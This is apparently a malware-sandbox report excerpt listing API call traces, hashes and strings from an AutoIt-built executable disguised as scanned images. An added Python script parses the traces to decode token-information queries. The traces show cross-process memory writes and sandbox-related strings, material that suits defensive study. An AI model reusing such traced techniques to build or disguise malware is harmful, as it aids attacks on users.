                                                                                • Instruction Fuzzy Hash: 92F0A935200345ABDB211FA49CCDF973BADEF8A762F500425FE05DA262CA30DC418A64
                                                                                APIs
                                                                                 • GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),?,00000000,?), ref: 004B102A
                                                                                 • GetLastError.KERNEL32(?,TokenPrivileges,?,00000000,?), ref: 004B1036
                                                                                 • GetProcessHeap.KERNEL32(00000008,?,?,TokenPrivileges,?,00000000,?), ref: 004B1045
                                                                                 • HeapAlloc.KERNEL32(00000000,?,TokenPrivileges,?,00000000,?), ref: 004B104C
                                                                                 • GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),00000000,?,?,?,TokenPrivileges,?,00000000,?), ref: 004B1062
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 44706859-0
                                                                                • Opcode ID: 8936425d9f12a3b5c14f6e9f53aff1ee0258b22a36c2be5faf62448deb67c76c
                                                                                • Instruction ID: 2afbcc1854334d6b66663703475c19669976815423687b6de2599575f595de55
                                                                                • Opcode Fuzzy Hash: 8936425d9f12a3b5c14f6e9f53aff1ee0258b22a36c2be5faf62448deb67c76c
                                                                                • Instruction Fuzzy Hash: 63F0CD35200341EBDB212FA4ECD8F973BADEF8A761F100425FE05EB261CA30D8418A74
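                                                                                 Reading note on the two GetTokenInformation records above: the call sequence GetTokenInformation, GetLastError, GetProcessHeap, HeapAlloc, GetTokenInformation is the standard two-call size query (the first call is made with a zero-length buffer, fails with ERROR_INSUFFICIENT_BUFFER, and returns the required size; the caller allocates and calls again with the same class). The class value is the hex argument in position two: 00000002 is TokenGroups and 00000003 is TokenPrivileges in winnt.h (TokenIntegrityLevel is 25), so decode the number rather than trusting any text label printed next to it. The following Python script is an added example, not part of the Joe Sandbox report or of the sample: it parses API records in this page's "• Func.MODULE(args), ref: ADDR" format, decodes the TOKEN_INFORMATION_CLASS argument, and flags the size-query idiom. The sample text is constructed from lines on this page; its grouping into two records, and the deliberately wrong "(TokenIntegrityLevel)" label kept in it, are assumptions made for the demo.

```python
import re

# Constructed sample in the shape of the Joe Sandbox IDA-plugin "APIs" records
# on this page. The call lines are copied from the report; grouping them into
# two records is an assumption for the demo, and the "(TokenIntegrityLevel)"
# label is kept on purpose to show that the decoder ignores it.
SAMPLE_REPORT = """\
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 004B102A
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 004B1036
• GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004B1045
• HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 004B104C
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004B1062
Memory Dump Source
APIs
• CloseHandle.KERNEL32(?,?,?,?,004C017D,?,004C32FC,?,00000001,00492592,?), ref: 004C0324
• DeleteObject.GDI32 ref: 00469616
  • Part of subcall function 004829C8: RtlFreeHeap.NTDLL(00000000,00000000), ref: 004829DE
Memory Dump Source
"""

# One "• Func.MODULE(args), ref: ADDR" line, with or without an argument list,
# optionally prefixed by the "Part of subcall function XXXX:" marker.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_ARG = re.compile(r"^([0-9A-Fa-f]{8})")

# TOKEN_INFORMATION_CLASS values from winnt.h that matter when reading these traces.
TOKEN_INFORMATION_CLASS = {
    1: "TokenUser", 2: "TokenGroups", 3: "TokenPrivileges", 4: "TokenOwner",
    5: "TokenPrimaryGroup", 6: "TokenDefaultDacl", 7: "TokenSource", 8: "TokenType",
    9: "TokenImpersonationLevel", 10: "TokenStatistics", 11: "TokenRestrictedSids",
    12: "TokenSessionId", 18: "TokenElevationType", 19: "TokenLinkedToken",
    20: "TokenElevation", 25: "TokenIntegrityLevel",
}
ALLOCATORS = {"HeapAlloc", "RtlAllocateHeap", "LocalAlloc", "GlobalAlloc", "VirtualAlloc", "malloc"}


def parse_records(text):
    """Split report text into records: each 'APIs' header opens a list of calls
    and 'Memory Dump Source' closes it. Lines that are not API calls are skipped."""
    records, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = []
            records.append(current)
        elif stripped == "Memory Dump Source":
            current = None
        elif current is not None:
            m = API_LINE.match(line)
            if m:
                args = m.group("args")
                current.append({
                    "func": m.group("func"),
                    "module": m.group("module"),
                    "args": args.split(",") if args is not None else [],
                    "ref": int(m.group("ref"), 16),
                    "subcall": m.group("sub"),
                })
    return records


def token_class(call):
    """For a GetTokenInformation call, decode the 2nd argument (TokenInformationClass)
    from its numeric value. Returns (value, name), or None if the call is something
    else or the sandbox only recorded '?' for that argument."""
    if call["func"] != "GetTokenInformation" or len(call["args"]) < 2:
        return None
    m = HEX_ARG.match(call["args"][1].strip())
    if not m:
        return None
    value = int(m.group(1), 16)
    return value, TOKEN_INFORMATION_CLASS.get(value, "unknown")


def detect_size_query(record):
    """Return token classes queried with the two-call idiom: a probe call, then an
    allocation, then a second GetTokenInformation with the same class."""
    found, pending, allocated = [], set(), set()
    for call in record:
        tc = token_class(call)
        if tc:
            if tc[0] in allocated and tc[0] not in found:
                found.append(tc[0])
            else:
                pending.add(tc[0])
        elif call["func"] in ALLOCATORS:
            allocated |= pending
            pending.clear()
    return found


def describe(call):
    """Render a call with the class decoded from the number the trace recorded."""
    where = f"{call['ref']:08X}"
    tc = token_class(call)
    if tc:
        return f"{where} {call['func']}(class={tc[0]} {tc[1]})"
    return f"{where} {call['func']}.{call['module']}"


if __name__ == "__main__":
    for rec in parse_records(SAMPLE_REPORT):
        for call in rec:
            print(describe(call))
        print("size-query idiom on classes:", detect_size_query(rec))
```

                                                                                 Run it against the full text of a report page to list every token class a sample queries; a TokenElevation or TokenIntegrityLevel lookup next to the sandbox-detection signatures in this report is worth a closer look, while TokenGroups and TokenPrivileges are what an AutoIt runtime's IsAdmin-style checks normally read.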
                                                                                APIs
                                                                                • CloseHandle.KERNEL32(?,?,?,?,004C017D,?,004C32FC,?,00000001,00492592,?), ref: 004C0324
                                                                                • CloseHandle.KERNEL32(?,?,?,?,004C017D,?,004C32FC,?,00000001,00492592,?), ref: 004C0331
                                                                                • CloseHandle.KERNEL32(?,?,?,?,004C017D,?,004C32FC,?,00000001,00492592,?), ref: 004C033E
                                                                                • CloseHandle.KERNEL32(?,?,?,?,004C017D,?,004C32FC,?,00000001,00492592,?), ref: 004C034B
                                                                                • CloseHandle.KERNEL32(?,?,?,?,004C017D,?,004C32FC,?,00000001,00492592,?), ref: 004C0358
                                                                                • CloseHandle.KERNEL32(?,?,?,?,004C017D,?,004C32FC,?,00000001,00492592,?), ref: 004C0365
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandle
                                                                                • String ID:
                                                                                • API String ID: 2962429428-0
                                                                                • Opcode ID: 204aa1a763946fa0f1e05a3b7dc12b7f3c628e5ca66d4685899d8c67b73c38d4
                                                                                • Instruction ID: 985e538c2df6f0c97780b6239d63644c01876dd86561b3278f7b09693f1fdd63
                                                                                • Opcode Fuzzy Hash: 204aa1a763946fa0f1e05a3b7dc12b7f3c628e5ca66d4685899d8c67b73c38d4
                                                                                • Instruction Fuzzy Hash: A401DC76800B81CFCB30AF66D880813FBF9BF602153048A3FD59252A31C3B4A949CE84
                                                                                APIs
                                                                                • _free.LIBCMT ref: 0048D752
                                                                                  • Part of subcall function 004829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0048D7D1,00000000,00000000,00000000,00000000,?,0048D7F8,00000000,00000007,00000000,?,0048DBF5,00000000), ref: 004829DE
                                                                                  • Part of subcall function 004829C8: GetLastError.KERNEL32(00000000,?,0048D7D1,00000000,00000000,00000000,00000000,?,0048D7F8,00000000,00000007,00000000,?,0048DBF5,00000000,00000000), ref: 004829F0
                                                                                • _free.LIBCMT ref: 0048D764
                                                                                • _free.LIBCMT ref: 0048D776
                                                                                • _free.LIBCMT ref: 0048D788
                                                                                • _free.LIBCMT ref: 0048D79A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 67c216abdaa2063e021cc9723780b37122cf033d08518f76fdc0bdbba978a87b
                                                                                • Instruction ID: cb241760b06db882ea1c6bf228bf9f05597ab54ef16dd6cc4b2b4a160dbf744e
                                                                                • Opcode Fuzzy Hash: 67c216abdaa2063e021cc9723780b37122cf033d08518f76fdc0bdbba978a87b
                                                                                • Instruction Fuzzy Hash: B3F04FB2A41204AB8621FB69FAC1C5F7BEDBB04310B954C0BF049D7642C72DFC808768
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 004B5C58
                                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 004B5C6F
                                                                                • MessageBeep.USER32(00000000), ref: 004B5C87
                                                                                • KillTimer.USER32(?,0000040A), ref: 004B5CA3
                                                                                • EndDialog.USER32(?,00000001), ref: 004B5CBD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                • String ID:
                                                                                • API String ID: 3741023627-0
                                                                                • Opcode ID: 87bd2b6aa4324dbdd151b613b120ac71108dd1d3c4bf8b77c272c6c8f20a080a
                                                                                • Instruction ID: 991dfa8aa43a5e132f54f8773face458731c0a47ecce11af0d85ddac589fc5ea
                                                                                • Opcode Fuzzy Hash: 87bd2b6aa4324dbdd151b613b120ac71108dd1d3c4bf8b77c272c6c8f20a080a
                                                                                • Instruction Fuzzy Hash: 97018B305007449BFB205B20DDCEFE7BBB9BF00705F00066AA543A50E1D7F469458A99
                                                                                APIs
                                                                                • _free.LIBCMT ref: 004822BE
                                                                                  • Part of subcall function 004829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0048D7D1,00000000,00000000,00000000,00000000,?,0048D7F8,00000000,00000007,00000000,?,0048DBF5,00000000), ref: 004829DE
                                                                                  • Part of subcall function 004829C8: GetLastError.KERNEL32(00000000,?,0048D7D1,00000000,00000000,00000000,00000000,?,0048D7F8,00000000,00000007,00000000,?,0048DBF5,00000000,00000000), ref: 004829F0
                                                                                • _free.LIBCMT ref: 004822D0
                                                                                • _free.LIBCMT ref: 004822E3
                                                                                • _free.LIBCMT ref: 004822F4
                                                                                • _free.LIBCMT ref: 00482305
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 4b9d9d4beb7ffb054854075998280dd095edf8c611501786b29764f147457e1e
                                                                                • Instruction ID: 86e0de0a3a47c05eaa7089e61b3b54e273a57fc7bf72faf113da79f4d3f6d4fa
                                                                                • Opcode Fuzzy Hash: 4b9d9d4beb7ffb054854075998280dd095edf8c611501786b29764f147457e1e
                                                                                • Instruction Fuzzy Hash: 69F030F85815109B8622BF55BE4184D3F64BB3A750701294BF410D22B2C7791457BBAC
                                                                                APIs
                                                                                • EndPath.GDI32(?), ref: 004695D4
                                                                                • StrokeAndFillPath.GDI32(?,?,004A71F7,00000000,?,?,?), ref: 004695F0
                                                                                • SelectObject.GDI32(?,00000000), ref: 00469603
                                                                                • DeleteObject.GDI32 ref: 00469616
                                                                                • StrokePath.GDI32(?), ref: 00469631
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                • String ID:
                                                                                • API String ID: 2625713937-0
                                                                                • Opcode ID: d1f44561877719925fdcf06bd984d838db263a7980c34530c27b2ff103adb97b
                                                                                • Instruction ID: eb01b8b4b222b8ed05f10483239796ec832c39e3c9079f3728506eca9a5c834d
                                                                                • Opcode Fuzzy Hash: d1f44561877719925fdcf06bd984d838db263a7980c34530c27b2ff103adb97b
                                                                                • Instruction Fuzzy Hash: DAF06D31006788EBC7264F64EC88B663B65AB22322F008224F425591F1D774499BEF2D
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: __freea$_free
                                                                                • String ID: a/p$am/pm
                                                                                • API String ID: 3432400110-3206640213
                                                                                • Opcode ID: 2cf32d43858787bfddf2db20b74720dfc6441e489ff6e6c4365dbd76614b51bd
                                                                                • Instruction ID: 28bdc92f05109c1edeb900fb14c892de6229e83cc1e0014bdf6551fc5eca774a
                                                                                • Opcode Fuzzy Hash: 2cf32d43858787bfddf2db20b74720dfc6441e489ff6e6c4365dbd76614b51bd
                                                                                • Instruction Fuzzy Hash: F1D1D331900205CAEB25AF68C845AFFB7B8EF06700F14495BE905ABB61D37D9D83CB59
                                                                                APIs
                                                                                  • Part of subcall function 00470242: EnterCriticalSection.KERNEL32(0052070C,00521884,?,?,0046198B,00522518,?,?,?,004512F9,00000000), ref: 0047024D
                                                                                  • Part of subcall function 00470242: LeaveCriticalSection.KERNEL32(0052070C,?,0046198B,00522518,?,?,?,004512F9,00000000), ref: 0047028A
                                                                                  • Part of subcall function 004700A3: __onexit.LIBCMT ref: 004700A9
                                                                                • __Init_thread_footer.LIBCMT ref: 004D6238
                                                                                  • Part of subcall function 004701F8: EnterCriticalSection.KERNEL32(0052070C,?,?,00468747,00522514), ref: 00470202
                                                                                  • Part of subcall function 004701F8: LeaveCriticalSection.KERNEL32(0052070C,?,00468747,00522514), ref: 00470235
                                                                                  • Part of subcall function 004C359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 004C35E4
                                                                                  • Part of subcall function 004C359C: LoadStringW.USER32(00522390,?,00000FFF,?), ref: 004C360A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                                                • String ID: x#R$x#R$x#R
                                                                                • API String ID: 1072379062-4169567378
                                                                                • Opcode ID: f87dd7ac85cd8d4f9679f1759ad30120b7d84b7d38c96a26416280647d0f8bca
                                                                                • Instruction ID: b8f11610e78d5f35b1950b315f39de64def1f0e806bc82de073d090920cc64d6
                                                                                • Opcode Fuzzy Hash: f87dd7ac85cd8d4f9679f1759ad30120b7d84b7d38c96a26416280647d0f8bca
                                                                                • Instruction Fuzzy Hash: C5C17B71A00105ABCB14EF59D8A0EBAB7B9EF48304F11806FE9059B391DB78ED45CB99
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: JOE
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00488B6E
                                                                                • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00488B7A
                                                                                • __dosmaperr.LIBCMT ref: 00488B81
                                                                                Similarity
                                                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr
                                                                                • String ID: .G
                                                                                APIs
                                                                                  • Part of subcall function 004BB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004B21D0,?,?,00000034,00000800,?,00000034), ref: 004BB42D
                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004B2760
                                                                                  • Part of subcall function 004BB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004B21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 004BB3F8
                                                                                  • Part of subcall function 004BB32A: GetWindowThreadProcessId.USER32(?,?), ref: 004BB355
                                                                                  • Part of subcall function 004BB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,004B2194,00000034,?,?,00001004,00000000,00000000), ref: 004BB365
                                                                                  • Part of subcall function 004BB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,004B2194,00000034,?,?,00001004,00000000,00000000), ref: 004BB37B
                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004B27CD
                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004B281A
                                                                                Similarity
                                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                • String ID: @
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe,00000104), ref: 00481769
                                                                                • _free.LIBCMT ref: 00481834
                                                                                • _free.LIBCMT ref: 0048183E
                                                                                Similarity
                                                                                • API ID: _free$FileModuleName
                                                                                • String ID: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe
                                                                                APIs
                                                                                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004BC306
                                                                                • DeleteMenu.USER32(?,00000007,00000000), ref: 004BC34C
                                                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00521990,01298428), ref: 004BC395
                                                                                Similarity
                                                                                • API ID: Menu$Delete$InfoItem
                                                                                • String ID: 0
                                                                                APIs
                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,004ECC08,00000000,?,?,?,?), ref: 004E44AA
                                                                                • GetWindowLongW.USER32 ref: 004E44C7
                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004E44D7
                                                                                Similarity
                                                                                • API ID: Window$Long
                                                                                • String ID: SysTreeView32
                                                                                APIs
                                                                                • SysReAllocString.OLEAUT32(?,?), ref: 004B6EED
                                                                                • VariantCopyInd.OLEAUT32(?,?), ref: 004B6F08
                                                                                • VariantClear.OLEAUT32(?), ref: 004B6F12
                                                                                Similarity
                                                                                • API ID: Variant$AllocClearCopyString
                                                                                • String ID: *jK
                                                                                APIs
                                                                                  • Part of subcall function 004D335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,004D3077,?,?), ref: 004D3378
                                                                                • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 004D307A
                                                                                • _wcslen.LIBCMT ref: 004D309B
                                                                                • htons.WSOCK32(00000000,?,?,00000000), ref: 004D3106
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                • String ID: 255.255.255.255
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 004E4705
                                                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 004E4713
                                                                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 004E471A
                                                                                Similarity
                                                                                • API ID: MessageSend$DestroyWindow
                                                                                • String ID: msctls_updown32
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: _wcslen
                                                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 004E3840
                                                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 004E3850
                                                                                • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 004E3876
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: MessageSend$MoveWindow
                                                                                • String ID: Listbox
                                                                                • API String ID: 3315199576-2633736733
                                                                                • Opcode ID: 40cd2c8033f37684fff2aeb7ca33bad3f382a6041162b0d067db20ff3c2c04b6
                                                                                • Instruction ID: 47b3242ad6ac8d22e0e53ea1f553c4aa4bf0e316f6a2cb385112c973037ae2a5
                                                                                • Opcode Fuzzy Hash: 40cd2c8033f37684fff2aeb7ca33bad3f382a6041162b0d067db20ff3c2c04b6
                                                                                • Instruction Fuzzy Hash: B52107726001587BEF129F56CC85FBB37AEEF89756F008125F9009B290C675DC52C794
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 004C4A08
                                                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 004C4A5C
                                                                                • SetErrorMode.KERNEL32(00000000,?,?,004ECC08), ref: 004C4AD0
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: ErrorMode$InformationVolume
                                                                                • String ID: %lu
                                                                                • API String ID: 2507767853-685833217
                                                                                • Opcode ID: 8d688b984c08a888c94241b012db0d2d616dfa289169704cb85359101fed3191
                                                                                • Instruction ID: 12e05301e31500c13b0145791f7969b3953516f452707e331d66349464650420
                                                                                • Opcode Fuzzy Hash: 8d688b984c08a888c94241b012db0d2d616dfa289169704cb85359101fed3191
                                                                                • Instruction Fuzzy Hash: A3318E75A00108AFDB10DF54C985EAABBF8EF48308F1480AAF809DF252D775ED46CB65
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 004E424F
                                                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 004E4264
                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 004E4271
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: msctls_trackbar32
                                                                                • API String ID: 3850602802-1010561917
                                                                                • Opcode ID: 67ad1949356179ebdf6968b0e7c9ecd9d8eadf9aca7be1818153c7f03a24aaf5
                                                                                • Instruction ID: 6377e1175b83dc12853eb0bc913200c9675138ca598bdebc0e431fe825dc3af1
                                                                                • Opcode Fuzzy Hash: 67ad1949356179ebdf6968b0e7c9ecd9d8eadf9aca7be1818153c7f03a24aaf5
                                                                                • Instruction Fuzzy Hash: 9C113A312402887EEF205F3ACC45FAB3BACEFD5B65F010125FA44E2190C275DC119714
                                                                                APIs
                                                                                  • Part of subcall function 00456B57: _wcslen.LIBCMT ref: 00456B6A
                                                                                  • Part of subcall function 004B2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 004B2DC5
                                                                                  • Part of subcall function 004B2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 004B2DD6
                                                                                  • Part of subcall function 004B2DA7: GetCurrentThreadId.KERNEL32 ref: 004B2DDD
